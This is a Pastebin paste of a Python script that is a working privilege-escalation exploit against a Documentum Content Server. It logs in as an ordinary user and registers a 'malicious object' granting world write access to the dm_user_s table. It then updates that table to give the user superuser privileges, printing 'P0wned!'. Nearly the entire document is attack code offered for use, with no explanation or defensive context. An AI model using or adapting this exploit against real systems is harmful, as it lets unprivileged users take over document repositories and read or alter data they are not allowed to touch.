Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import socket
- import sys
- from os.path import basename
- from dctmpy.docbaseclient import DocbaseClient
- from dctmpy.obj.typedobject import TypedObject
- CIPHERS = "ALL:aNULL:!eNULL"
- def usage():
- print "usage:\n\t%s host port user password" % basename(sys.argv[0])
- def main():
- if len(sys.argv) != 5:
- usage()
- exit(1)
- print "Trying to connect to %s:%s as %s ..." % (sys.argv[1], sys.argv[2], sys.argv[3])
- (session, docbase) = create_session(*sys.argv[1:5])
- if is_super_user(session):
- print "Current user is a superuser, nothing to do"
- exit(1)
- print "Acquiring ID for malicious object ..."
- id = session.next_id(0x00)
- print "Acquired %s\nTrying to create following malicious object:" % id
- obj = TypedObject(session=session)
- obj.set_string("OBJECT_TYPE", "dm_registered")
- obj.set_bool("IS_NEW_OBJECT", True)
- obj.set_int("i_vstamp", 0)
- obj.set_string("table_name", "dm_user_s")
- obj.set_string("table_owner", docbase)
- obj.set_string("owner_name", docbase)
- obj.set_int("world_permit", 7)
- obj.set_string("object_name", "dm_user_s")
- obj.set_string("r_object_type", "dm_registered")
- obj.set_int("owner_table_permit", 15)
- obj.set_int("group_table_permit", 15)
- obj.set_int("world_table_permit", 15)
- print obj.dump()
- if not session.save(id, obj):
- print "Failed"
- exit(1)
- print "Becoming superuser..."
- r = session.query(
- "UPDATE dm_dbo.dm_user_s SET "
- "user_privileges=16 WHERE user_name=USER") \
- .next_record()[
- 'rows_updated']
- if r != 1:
- print "Failed"
- exit(1)
- print "P0wned!"
- def create_session(host, port, user, pwd, identity=None):
- print "Trying to connect to %s:%s as %s ..." % \
- (host, port, user)
- session = None
- try:
- session = DocbaseClient(
- host=host, port=int(port),
- username=user, password=pwd,
- identity=identity)
- except socket.error, e:
- if e.errno == 54:
- session = DocbaseClient(
- host=host, port=int(port),
- username=user, password=pwd,
- identity=identity,
- secure=True, ciphers=CIPHERS)
- else:
- raise e
- docbase = session.docbaseconfig['object_name']
- version = session.serverconfig['r_server_version']
- print "Connected to %s:%s, docbase: %s, version: %s" % \
- (host, port, docbase, version)
- return (session, docbase)
- def is_super_user(session):
- user = session.get_by_qualification(
- "dm_user WHERE user_name=USER")
- if user['user_privileges'] == 16:
- return True
- group = session.get_by_qualification(
- "dm_group where group_name='dm_superusers' "
- "AND any i_all_users_names=USER")
- if group is not None:
- return True
- return False
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement